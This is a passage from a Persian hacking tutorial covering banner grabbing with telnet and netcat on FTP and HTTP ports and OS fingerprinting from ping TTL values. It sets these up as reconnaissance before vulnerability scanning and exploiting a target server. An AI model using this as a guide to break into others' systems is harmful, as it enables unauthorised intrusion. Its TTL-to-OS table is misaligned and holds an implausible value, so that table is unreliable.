اﺻﻄﻼﺡﺎ ‪ ، SHH‬اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫در ﻣﻮرد ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ از ﺏﺮﻧﺎﻣﻪ ‪ elm mail‬و یﺎ از ﺏﺮﻧﺎﻣﻪ ‪ pine‬ﺟﻬﺖ اﺕﺼﺎل ﺏﻪ ﺱﺮور ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫ﺏﺮای اﺕﺼﺎل ﺏﻪ وب ﺱﺮور از ﺏﺮﻧﺎﻣﻪ ‪ Lynx‬اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫اﻟﺒﺘﻪ از ایﻦ دﺱﺖ ﺏﺮﻧﺎﻣﻪ ﺏﺴﻴﺎر اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎ ﻧﻮﻋﯽ ﮐﻼیﻨﺖ ﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ﺧﺎﺻﯽ هﺴﺘﻨﺪ ‪ ،‬ﺕﻘﺮیﺒﺎ در ﺏﻴﺸﺘﺮ ﻣﻮارد ﻣﻴﺘﻮان ﺏﻪ ﺟﺎی ایﻦ‬ ‫ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ )‪ ( telnet‬از ‪ NC‬اﺱﺘﻔﺎدﻩ ﮐﺮد‪ .‬اﻟﺒﺘﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ هﺎ ﭼﻪ ﮐﻼیﻨﺖ هﺎ و یﮑﺴﺮی اﻃﻼﻋﺎت را ﺏﺪﺱﺖ ﻣﯽ ﺁورﻧﺪ و ﺏﺮﻧﺎﻣﻪ ‪ NC‬و یﺎ‬ ‫‪ telnet‬یﮏ ﺱﺮی دیﮕﺮ ﮐﻪ ﮔﺮوﻩ اول از ﺏﺪﺱﺖ ﺁوری ﺁﻧﻬﺎ ﻧﺎﮐﺎم ﻣﻴﻤﺎﻧﺪ‪ .‬ﭘﺲ ﻣﻦ ﺏﻪ ﺷﻤﺎ ﺕﻮﺻﻴﻪ ﻣﻮﮐﺪ ﻣﻴﮑﻨﻢ از هﺮ دو ﻧﻮع اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﻧﻪ یﮏ‬ ‫ﻧﻮع از ﺁﻧﻬﺎ‪.‬‬ ‫اﻟﺒﺘﻪ ایﻦ را ذﮐﺮ ﮐﻨﻢ ﭘﻮیﺶ ﮔﺮ هﺎی ﭘﻮرت ﻣﻌﻤﻮﻻ ایﻦ ﮐﺎر را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ وﻟﯽ ﻣﻦ ﺕﺠﺮﺏﻪ ﺏﻪ ﺧﻮدم ﺙﺎﺏﺖ ﮐﺮدﻩ ﮐﻪ ﺏﺎیﺪ هﻤﻴﺸﻪ اﮔﺮ ﮐﺎری را‬ ‫ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮدﺕﺎن اﻧﺠﺎم دهﻴﺪ ﺡﺘﻤﺎ ‪ ،‬ﺧﻮد اﻧﺠﺎم دهﻴﺪ ﻧﻪ ایﻨﮑﻪ ﺏﺮ ﻋﻬﺪﻩ ﻧﺮم اﻓﺰار ﺏﮕﺰاریﺪ ﭼﻮن ان ﻧﺮم اﻓﺰار ﺷﻌﻮر ﻧﺪارد و ﻓﻘﻂ ﻣﺴﺌﻠﻪ هﺎی را ﺡﻞ‬ ‫ﻣﻴﮑﻨﺪ ﮐﻪ یﮏ دﻓﻌﻪ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ ان ﺏﺮایﺶ ﺡﻞ ﮐﺮدﻩ ﺏﺎﺷﺪ‪.‬‬ ‫ﺏﺮای ﻣﺘﺼﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ‪ telnet‬از ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪:‬‬ ‫‪telnet hostname port number‬‬ ‫و ﺏﺮای ﻣﺘﺼﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ‪ NC‬از ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪:‬‬ ‫]‪NC [-options] hostname port[s‬‬ ‫ﮐﻪ در ایﻦ ﻣﻮرد ﺏﻪ ﺟﺎی ]‪ [-options‬ﻣﺎ ﻓﻌﻼ ﺱﻮیﭻ ‪ –v‬را ﻣﻴﮕﺰاریﻢ ﺏﻘﻴﻪ ﭼﻴﺰهﺎ هﻢ ﮐﻪ ﺕﺎﺏﻠﻮ‪ .‬اﻟﺒﺘﻪ ایﻦ را ذﮐﺮ ﮐﻨﻢ ﺏﻌﺪ از ﭘﺎیﺎن هﻤﻴﻦ ﻣﻄﻠﺐ‬ ‫ﺁﻣﻮزش ﮐﺎﻣﻞ ‪ NC‬را ﻣﻴﺪهﻢ‪.‬‬ ‫یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ ﺕﺎ ﻗﻀﻴﻪ روﺷﻦ ﺷﻮد ‪ ،‬ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ ﺏﺎ ﺏﺮﻧﺎﻣﻪ ‪ NC‬و ‪ telnet‬ﺏﻪ یﮏ ﻣﺎﺷﻴﻦ ﺏﺎ ﭘﻮرت ‪ ٢١‬ﮐﻪ ‪ FTP‬اﺱﺖ ﻣﺘﺼﻞ ﺷﻮیﻢ‪:‬‬ ‫‪C :\> telnet xxx.xxx.xxx.xxx 21‬‬ ‫‪C :\> NC –v xxx.xxx.xxx.xxx 21‬‬ ‫ﺧﻮب در ﺟﻮاب ﺏﺮﻧﺎﻣﻪ اول ایﻦ ﮔﻮﻧﻪ ﺟﻮاب ﻣﻴﺪهﺪ ‪:‬‬ ‫‪Connected to xxxxxxxxxx‬‬ ‫‪220 ftp29 FTP server (UNIX(r) System V Release4.0) ready.‬‬ ‫‪SYST‬‬ ‫‪215 UNIX Type: L8 Version: SUNOS‬‬ ‫ﺧﻮب ﻣﺎ ﻓﻬﻤﻴﺪیﻢ ﮐﻪ ایﻦ ﺱﺮور از ﭼﻪ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و از ﭼﻪ ﺏﺮﻧﺎﻣﻪ ای ﺏﺮای ﺱﺮویﺲ دهﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ ).‬ﺏﺮای ان هﺎیﯽ ﮐﻪ ﺧﻴﻠﯽ ﻋﺠﻮل‬ ‫اﻧﺪ در ایﻦ ﻣﺮﺡﻠﻪ ﻣﻴﺘﻮاﻧﻨﺪ ﺏﺮوﻧﺪ و دﻧﺒﺎل ﺡﻔﺮﻩ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ و ‪ Exploit‬ﺏﺮای ﺁن ﺏﮕﺮدﻧﺪ ﺕﺎ ﺱﺮور هﮏ ﮐﻨﻨﺪ(‬ ‫ﺏﺮ ﻧﺎﻣﻪ ‪ Nc‬هﻢ ﻣﻴﻦ ﺟﻮری ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻦ دیﮕﻪ از ﺁﺕﻦ ﺻﺮف ﻧﻈﺮ ﮐﺮدم ایﻦ ذﮐﺮ ﮐﻨﻢ ایﻦ ﺏﺮﻧﺎﻣﻪ ) ‪ ( NC‬ﺧﻴﻠﯽ ﺏﻬﺘﺮ از ‪ telnet‬ﺟﻮاب‬ ‫ﻣﻴﺪهﺪ‪ .‬اﻟﺒﺘﻪ ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ هﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ در ﺏﺎﻻ ﮔﻔﺘﻢ ﺕﻤﺎم و یﺎ ﺏﻪ ﻋﺒﺎرت ﺏﻬﺘﺮی اﮐﺜﺮ ﭘﻮیﺶ ﮔﺮهﺎی ﭘﻮرت ایﻦ ﮔﻮﻧﻪ ﮐﺎر هﺎ را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ‪.‬‬ ‫ﺏﺮای اﺕﺼﺎل ﺏﻪ ﭘﻮرت ‪ ٨٠‬ﺏﺎیﺪ ﺏﻌﺪ از ﺏﺮﻗﺮاری ارﺕﺒﺎط ﻣﺎ یﮏ ﺱﺮی دﺱﺘﻮر ﺏﺮای ﺁن ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﺮوﺕﮑﻞ ‪ HTTP‬یﺎ اﺻﻄﻼﺡﺎ اﻧﺘﻘﺎل ﻣﺤﺘﻮای‬ ‫ﻓﺮا ﻣﺘﻦ ) ‪ ( Hyper Text Transfer Protocol‬ﺡﻮاﻟﻪ وب ﺱﺮور ﮐﻨﻴﻢ‪ .‬ﺏﻪ ﻣﺜﺎل زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ ‪:‬‬ ‫‪C :\> Telnet.exe xxx.xxx.xxx.xxx 80‬‬ ‫‪Connecting To xxx.xxx.xxx.xxx‬‬ ‫‪HTTP/ 1.1 200 OK‬‬ ‫‪Date: Tue. 29 Jun 2002 07:18:07‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٠‬‬

‫)‪Server: Apache /1.3.14 (UNIX) (Red-hat/Linux‬‬ ‫‪….‬‬ ‫ﺧﻮب ﻣﻦ ایﻦ ﺟﻮاب را ﮐﻮﺕﺎﻩ ﮐﺮدم و ﺁﺧﺮش ﺏﻪ ﻣﺎ یﮏ ﭘﻴﻐﺎم ﻣﻴﺪهﺪ ﮐﻪ ﺡﺎوی ایﻦ ﻣﻮﺽﻮع اﺱﺖ ﮐﻪ " ﺱﺮویﺴﯽ در روی ﭘﻮرت ‪ ٨٠‬در ﺡﺎل‬ ‫اﺟﺮا اﺱﺖ " !!! ﺧﻮب در ایﻦ ﺡﺎﻟﺖ ایﻦ ﺱﺮویﺲ ﭼﻮن ﻣﺎ ﺏﺎ اون ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮدیﻢ ﻣﻴﺨﻮاهﺪ ﺏﺒﻴﻨﻪ ﻣﺎ ﭼﻪ ﻣﻴﮕﻴﻢ و یﺎ ﺏﻪ ﻋﺒﺎرﺕﯽ از ﻣﺎ یﮏ‬ ‫ﻓﺮﻣﺎن ﻣﻴﺨﻮاهﺪ‪ .‬ﺧﻮب ﻣﺎ ﻓﺮﻣﺎن ‪ GET‬را ﻧﻮﺷﺘﻪ ﺏﻌﺪ دو ﺏﺎر ‪ Enter‬زدﻩ اﻟﺒﺘﻪ ﺟﻠﻮی ایﻦ ﻓﺮﻣﺎن یﮏ ﭼﻴﺰی ﻣﻴﻨﻮیﺴﻴﻢ‪ .‬در ﺟﻮاب ﭼﻮن ﻣﺎ ﺟﻠﻮی‬ ‫ﻓﺮﻣﺎن را ﭼﺮﻧﺪ ﭘﺮﻧﺪ ﻧﻮﺷﺘﻴﻢ ﺏﻪ ﻣﺎ یﮏ ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ در ﺁن ﺟﻮاب ﻣﺎ ﺏﺎیﺪ دﻧﺒﺎل هﺪر ﭘﺮوﺕﮑﻞ ﺏﮕﺮدیﺪ‪ .‬ایﻦ از ایﻦ‪.‬‬ ‫ایﻦ را ذﮐﺮ ﮐﻨﻢ وﻗﺘﯽ ﻣﻦ ﺏﻪ ﺱﺮویﺲ ‪ Telnet‬هﻤﻴﻦ ﻣﺎﺷﻴﻦ وﺻﻞ ﺷﺪم اﻃﻼﻋﺎﺕﯽ را ﮐﻪ ﺏﺮای ﻣﻦ ﻓﺮﺱﺘﺎد ﺏﺴﻴﺎر دروﻏﻴﻦ ﺏﻮد ﭼﻮن ﺁن را دﺱﺖ‬ ‫ﮐﺎری ﮐﺮدﻩ ﺏﻮدن و ﻓﺎیﻞ ‪ /etc/issue.net‬را ﭘﺮ از هﺪر هﺎ و ﺏﺮﭼﺴﺐ هﺎی دروغ ﻧﻮﺷﺘﻪ ﺏﻮدن ﮐﻪ ایﻦ ﮐﺎر ﮐﺎﻣﻼ ﻋﻤﻠﯽ اﺱﺖ ﭘﺲ ﺕﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎیﺪ‬ ‫ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف ﺧﻮدﺕﺎن ﺏﺎ ﭘﻮرت هﺎی ﻣﺨﺘﻠﻒ ﺁن وﺻﻞ ﺷﺪﻩ و ﺏﻌﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺟﻤﻊ ﺏﻨﺪی ﮐﻪ ﻣﻴﮑﻨﻴﺪ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺱﺮویﺲ هﺎ را ﺡﺪس‬ ‫ﺏﺰﻧﻴﺪ‪.‬‬ ‫در ایﻦ ﻣﺒﺤﺚ یﮏ ﺏﺤﺚ ﮐﻮﭼﻮﻟﻮ دیﮕﺮ ﺏﺎﻗﯽ ﻣﻴﻤﺎﻧﺪ و ﺁن هﻢ ﺷﻨﺎﺱﺎیﯽ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺏﺎ اﺱﺘﻔﺎدﻩ از ارزش ‪ TTL‬در ﻓﺮﻣﺎن ‪ Ping‬اﺱﺖ ﮐﻪ ﺏﻪ‬ ‫ایﻦ ﺻﻮرت اﺱﺖ ﮐﻪ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺕﻘﺮیﺒﺎ ارزش ایﻦ ﻓﻴﻠﺪ ﺧﻮد را در یﮏ ﻣﺤﺪودﻩ ایﯽ ﻗﺮار دادﻩ اﺱﺖ‪ .‬ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ روش ﺷﻤﺎ ﻓﺮﻣﺎن‬ ‫‪ Ping‬را اﺟﺮا ﮐﺮدﻩ و ﺏﻪ ﺱﺘﻮن ‪ TTL‬یﮏ ﻧﮕﺎﻩ ﻣﻴﺎﻧﺪازیﺪ و ﺏﻌﺪ ﺁن را ﺏﺎ ﺟﺪول ﭘﺎیﻴﻦ ﻣﻘﺎیﺴﻪ ﮐﺮدﻩ و ﻧﻮع ﺁن ﺱﻴﺴﺘﻢ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ ﺏﻪ ﻣﺜﺎل‬ ‫زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ ‪:‬‬ ‫‪C:\>ping xxx.xxx.xxx.xxx‬‬ ‫‪Pinging xxx.xxx.xxx.xxx with 32 bytes of data:‬‬ ‫‪Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128‬‬ ‫‪Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128‬‬ ‫‪Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128‬‬ ‫‪Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128‬‬ ‫‪Ping statistics for xxx.xxx.xxx.xxx :‬‬ ‫‪Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),‬‬ ‫‪Approximate round trip times in milli-seconds:‬‬ ‫‪Minimum = 0ms, Maximum = 0ms, Average = 0ms‬‬ ‫ﻣﻘﺪار ‪TTL‬‬ ‫‪32‬‬ ‫‪128‬‬ ‫‪128‬‬ ‫‪60‬‬ ‫‪64‬‬ ‫‪64‬‬ ‫‪64‬‬ ‫‪64‬‬ ‫‪128‬‬ ‫‪60‬‬ ‫‪60‬‬ ‫‪60‬‬ ‫‪2514255‬‬ ‫‪60‬‬

‫ﻧﺎم ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ‬ ‫‪Windows 9x/NT Intel‬‬ ‫‪Windows XP PRO & Home‬‬ ‫‪Windows 2000‬‬ ‫‪Digital Unix 4.0 Alpha‬‬ ‫‪Unisys x Mainframe‬‬ ‫‪Linux 2.2.x Intel 64‬‬ ‫‪FTX(UNIX) 3.3STRTUS 64‬‬ ‫‪SCO Compaq‬‬ ‫‪Netware 4.11 Intel‬‬ ‫‪AIX 4.3.X IBM/R6000‬‬ ‫‪AIX 4.2.X IBM/R6000‬‬ ‫‪Cisco 11.2 7507‬‬ ‫‪Cisco 12.0‬‬ ‫‪IRIX 6.x SGI‬‬

‫ﺧﻮب هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﺘﻮﺟﻪ ﺷﺪیﺪ ایﻦ ﮐﺎر دﻗﺖ زیﺎدی ﻧﺪارد‪ .‬اﻟﺒﺘﻪ ‪ Nmap‬ﺕﻮﺻﻴﻪ ﻣﻦ ﺏﺮای ﺷﻨﺎﺱﺎیﯽ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺱﺮویﺲ هﺎ اﺱﺖ ‪.‬‬ ‫ﺕﺎ ﺏﻪ ﺡﺎل ‪ ٢‬ﻣﺮﺡﻠﻪ از ﻣﺮاﺡﻞ ‪ ۴‬ﮔﺎﻧﻪ هﮏ را ﺏﺮای ﺷﻤﺎ هﺎ ﻋﺰیﺰان ﺕﻮﺽﻴﺢ دادم و ﻓﻘﻂ یﮏ ﻣﺮﺡﻠﻪ دیﮕﺮ ﺏﺎﻗﯽ ﻣﺎﻧﺪﻩ ﮐﻪ ﺁن را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ‪.‬‬ ‫ﻗﺒﻮل دارم ﮔﺴﻴﺨﺘﮕﯽ ﻣﻄﺎﻟﺐ ﺕﺎ ﺏﻪ ایﻨﺠﺎ ﺏﺴﻴﺎر اﺱﺖ اﻣﺎ واﻗﻌًﺎ ﺏﻪ ﻣﻦ ﺡﻖ ﺏﺪهﻴﺪ ﮐﻪ ﻣﻄﻠﺐ ﺏﺴﻴﺎر اﺱﺖ و اﺏﺰارهﺎ ﺏﻴﺸﺘﺮ ﻣﻦ ﻧﻤﻴﺪاﻧﻢ از ﮐﺪام ﺏﻨﻮیﺴﻢ و‬ ‫ﭼﻪ ﺏﻨﻮیﺴﻢ!! در ﺽﻤﻦ ﺱﻌﯽ ﻣﻦ ﺏﺮ ایﻦ اﺱﺖ ﺕﺎ ﺷﻤﺎ ﺏﻔﻬﻤﻴﺪ ﮐﻪ اﺻﻼ ایﻦ ﻋﻤﻠﻴﺎت هﺎ و ﻣﮑﺎﻧﻴﺰم هﺎ ﭼﮕﻮﻧﻪ اﻧﺠﺎم ﻣﻴﺸﻮد و ایﻦ ﮐﺎر را ﺧﻴﻠﯽ ﻣﺸﮑﻞ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤١‬‬

‫ﺕﺮ ﻣﻴﮑﻨﺪ ﭼﻮن ﻣﻦ ﺏﺎیﺪ از اﺻﻮل ایﻦ ﮐﺎر ﺏﺮای ﺷﻤﺎ ﺏﮕﻢ ﮐﻪ واﻗﻌًﺎ در ایﻦ ﺏﺎرﻩ ﻣﻄﻠﺐ ﺧﻴﻠﯽ ﮐﻢ اﺱﺖ و اﻟﺒﺘﻪ ﺏﺎیﺪ ﺧﻮاﻧﻨﺪﻩ یﮑﺴﺮی اﻃﻼﻋﺎت ﭘﺎیﻪ‬ ‫داﺷﺘﻪ ﺏﺎﺷﺪ‪ .‬وﻟﯽ ﻣﻦ ﺱﻌﯽ ﮐﺮدم ) یﻌﻨﯽ ‪ ( %۶٠‬ﮐﻪ ایﻦ ﻣﻄﻠﺐ ﺏﺮای ﺁﻧﻬﺎی ﮐﻪ ﻣﻔﻬﻮم هﺎی ﭘﺎیﻪ ایﯽ هﻤﭽﻮن ﭘﻮرت و یﺎ ‪ Telnet‬و‪ ...‬را ﺏﺪاﻧﻨﺪ‬ ‫ﻣﻔﻴﺪ ﺏﺎﺷﺪ‪.‬‬ ‫ﮔﺎم ﺱﻮم‬ ‫ﻣﻘﺪﻣﻪ ‪:‬‬ ‫ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل ﺷﻤﺎ ﭘﻮرت هﺎی ﺏﺎز ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی و ﺱﺮویﺲ دهﻨﺪﻩ هﺎ و ﻣﺸﺨﺼﺎت ﺷﺒﮑﻪ ه ﺪف و ی ﺎ ﻣﺎﺷ ﻴﻨﻬﺎی ﮐ ﻪ در‬ ‫ﺁن ﺷﺒﮑﻪ اﺱﺖ را ﻣﺸﺨﺺ ﮐﺮدﻩ ایﺪ و اﻃﻼﻋﺎت ﮐﺎﻣﻠﯽ داریﺪ‪ .‬در ایﻦ ﺟﺎ ﻣﻤﮑﻦ اﺱﺖ دو اﺕﻔﺎق ﺏﻴﻔﺘﺪ یﺎ ﺷﻤﺎ ﺏﺎ ﺕﺠﺮﺏﻪ ای ﺪ ﮐ ﻪ هﻴﭽ ﯽ ی ﺎ ﺏ ﺪون ﺕﺠﺮﺏ ﻪ‬ ‫اﮔﺮ ﻋﺠﻮل ﻧﻴﺴﺘﻴﺪ ایﻦ ﻣﺮﺡﻠﻪ را اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﺏﻌﺪ ﺕﻬﺎﺟﻢ اﺻﻠﯽ ﺏﺮای ﺏﺪﺱﺖ ﮔﺮﻓﺘﻦ ﻣﺎﺷﻴﻦ هﺪف را ﺁﻏﺎز ﻣﻴﮑﻨﻴﻢ‪ .‬اﮔﺮ ﻋﺠﻮل هﺴﺘﻴﺪ ﮐﻪ ﻓﮑ ﺮ ﻣﻴﮑ ﻨﻢ‬ ‫دیﮕﻪ ﺏﻪ ایﻦ ﻣﺮﺡﻠﻪ هﻢ ﻧﺮﺱﻴﺪﻩ ایﺪ ﭼﻮن ﻣﺜﻼ اﮔﺮ یﮏ ﭘﻮرت ﺏﺎز ﮐﻪ ﺕﻮﺱﻂ یﮏ اﺱﺐ ﺕﺮوا یﺎ یﮏ در ﭘﺸﺘﯽ ﺏﺎز ﺷﺪﻩ ﺱﺮاغ ﺁﻧﻬﺎ رﻓﺘﻪ ایﺪ و ﺏﻪ ﻧ ﻮﻋﯽ‬ ‫ﻣﺮدﻩ ﺧﻮری ﻣﯽ ﮐﻨﻴﺪ‪ .‬ﻣﺎ در ایﻦ ﻣﺮﺡﻠﻪ ﻣﻴﺪاﻧﻴﻢ ﮐﻪ ﻣﺜﻼ ﻣﺎﺷﻴﻦ هﺪف ﭼﻪ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ روی ﺁن هﺴﺖ و‪ ...‬ﺏ ﺎ داﻧ ﺴﺘﻦ ای ﻦ ﻣﻮﺽ ﻮع ﻣﻴﺘ ﻮاﻧﻴﻢ ﺱ ﺮاغ‬ ‫ﺡﻔﺮﻩ هﺎی ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺁن رﻓﺘﻪ ) اﮔﺮ از ﺡﻔﺮﻩ هﺎی ﺁن اﻃﻼﻋﯽ ﻧﺪاریﺪ ﺏﻪ یﮏ از ﺱﺎیﺘﻬﺎی ﻣﺸﻬﻮر ﮐﻪ در اداﻣﻪ ﻣﻴﮕﻮیﻢ ﻣﺮاﺟﻌﻪ ﮐﻨﻴ ﺪ (و ‪Exploit‬‬ ‫هﺎی ﺁن را اﺱﺘﻔﺎدﻩ ﮐﺮدﻩ وﻟﯽ ﻣﻌﻤﻮﻻ ایﻦ ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﺏﺴﻴﺎر زیﺎد اﺱﺖ و اﻟﺒﺘﻪ ﻣﺪیﺮ ﺱﺎیﺖ یﺎ ﺁن ﺱ ﺮور ‪ Patch‬ه ﺎی ﺁن ﺡﻔ ﺮﻩ ه ﺎ را ﻣﻌﻤ ﻮﻻ‬ ‫ﻧﺼﺐ ﻣﻴﮑﻨﻨﺪ و اﻧﺠﺎم ﺕﮏ ﺕﮏ ایﻦ ﮐﺎر ﺏﺴﻴﺎر ﻣﺸﮑﻞ اﺱﺖ‪ .‬ﺧﻮب ﻣﺎ ایﻦ ﻣﺮﺡﻠﻪ را ﺏﺮای ایﻦ اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﮐﻪ ایﻦ ﮐﺎر را اﺕﻮﻣﺎﺕﻴ ﮏ ﮐ ﺮدﻩ و ﺡﻔ ﺮﻩ‬ ‫هﺎی اﺱﻴﺐ ﭘﺬیﺮ را زودﺕﺮ ﮐﺸﻒ ﮐﻨﻴﻢ ) ﮔﻔﺘﻢ ﺏﻌﻀﯽ ﺡﻔﺮﻩ هﺎ ﺏﻪ واﺱﻄﻪ ‪ Patch‬هﺎ ﻣﺸﮑﻞ ان هﺎ ﺏﺮﻃﺮف ﻣﻴﺸﻮد ( اﻟﺒﺘﻪ یﮏ هﺪف دیﮕ ﺮ ه ﻢ داری ﻢ‬ ‫ﺁن هﻢ ایﻦ اﺱﺖ ﮐﻪ ﻣﻌﻤﻮﻻ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی ﻣﻌﻤ ﻮﻻ ﻣﺘ ﺪهﺎی ه ﮏ را ه ﻢ ﺁزﻣ ﺎیﺶ ﻣﻴﮑﻨﻨ ﺪ و اﮔ ﺮ ﺟ ﻮاب ده ﺪ ﺏ ﻪ ﻣ ﺎ اﻃ ﻼع‬ ‫ﻣﻴﺪهﻨﺪ‪ .‬ﺡﺘﻤﺎ ﻣﺘﻮﺟﻪ ﺷﺪیﺪ ﮐﻪ اﮔﺮ ﺕﺠﺮﺏﻪ ﺧﻮﺏﯽ در اﺧﺘﻴﺎر داﺷﺘﻪ ﺏﺎﺷﺪ ﺏﺮاﺡﺘﯽ ﻣﻴﺘﻮاﻧﻴﺪ ایﻦ ﻣﺮﺡﻠﻪ را ﻧﺎدیﺪﻩ ﮔﺮﻓﺘﻪ و ﮐﺎر را یﮏ ﺱﺮﻩ ﮐﻨﻴﺪ وﻟﯽ ﻣﻦ‬ ‫ﺕﻤﺎم ﺁﻧﻬﺎیﯽ را ﮐﻪ در ایﻦ ﻣﺪت ﻣﻴﺸﻨﺎﺱﻢ و اﻟﺒﺘﻪ ﻗﺒﻮل دارم ﺁﻧﻬﺎ را ﺏﺎ ایﻨﮑﻪ ﺕﺠﺮﺏﻪ ﺏﺴﻴﺎر ﻓﻮق اﻟﻌﺎدﻩ ایﯽ در ﮐﻞ اﻣﻮرات ه ﮏ دارﻧ ﺪ ای ﻦ ﻣﺮﺡﻠ ﻪ را‬ ‫ﺏﻪ هﻴﭻ وﺟﻪ ﻧﺎدیﺪﻩ ﻧﻤﯽ ﮔﻴﺮﻧﺪ و ﺏﻪ ﻗﻮل یﮑﯽ از ﺁﻧﻬﺎ ﮐﻪ هﻤﻴﺸﻪ ﻣﯽ ﮔﻔ ﺖ‪ " :‬ﺁدم ﻣﻐ ﺮور ‪ ...‬ﻣﻴ ﺸﻮد " و ﺱ ﺨﻦ ﺁﺏﺮاه ﺎم را هﻤﻴ ﺸﻪ ﺕﮑ ﺮار ﻣ ﯽ ﮐ ﺮد‪.‬‬ ‫اول ایﻦ ﻣﻘﺎﻟﻪ ﮔﻔﺘﻢ ﺱﺨﻦ را ﺡﺎﻻ یﮏ ﺏﺎر دیﮕﺮ ﻣﻴﮕﻮیﻢ " ﭼﻨ ﺎن ﭼ ﻪ ﻗ ﺮار ﺏﺎﺷ ﺪ درﺧﺘ ﯽ را در ﻣ ﺪت ‪ ۶‬ﺱ ﺎﻋﺖ ﻗﻄ ﻊ ﮐ ﻨﻢ ‪ ۴ ،‬ﺱ ﺎﻋﺖ ﻧﺨ ﺴﺖ ﺁن را‬ ‫ﺻﺮف ﺕﻴﺰ ﮐﺮدن ﺕﺒﺮ ﺧﻮاهﻢ ﮐﺮد "‪ .‬ﻣﻌﺮﻓﯽ ایﻦ ﭘﻮیﺶ ﮔﺮ هﺎ ﮐﻪ اﻟﺒﺘﻪ ﺏﺮای هﺮ ﺱﺮویﺴﯽ ﺕﺨﺼﺼﯽ ﻧﻴﺰ هﺴﺘﻨﺪ یﮏ ﮐﻤﯽ دردﺱﺮ ﺱ ﺎز اﺱ ﺖ ﭼ ﻮن‬ ‫ﺏﻴﺸﺘﺮ اﺏﺰارهﺎی ﺧﻮب ﺁن ‪ ،‬ﮐﻪ ﮐﻤﺘﺮ اﺷﺘﺒﺎﻩ ﻣﯽ ﮐﻨﺪ روی ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﻟﻴﻨﻮﮐﺲ اﺟﺮا ﻣﻴﺸﻮﻧﺪ ﺕﺎ ویﻨ ﺪوز اﻣ ﺎ اﺧﻴ ﺮ ی ﮏ ﮐ ﺎرایﯽ ﺷ ﺪﻩ اﻣ ﺎ واﻗﻌ ًﺎ‬ ‫ﻧﻤﯽ ﺷﻮد ﺧﻠﻊ ﻣﻮﺟﻮد را ﺕﻮﺟﻴﻪ 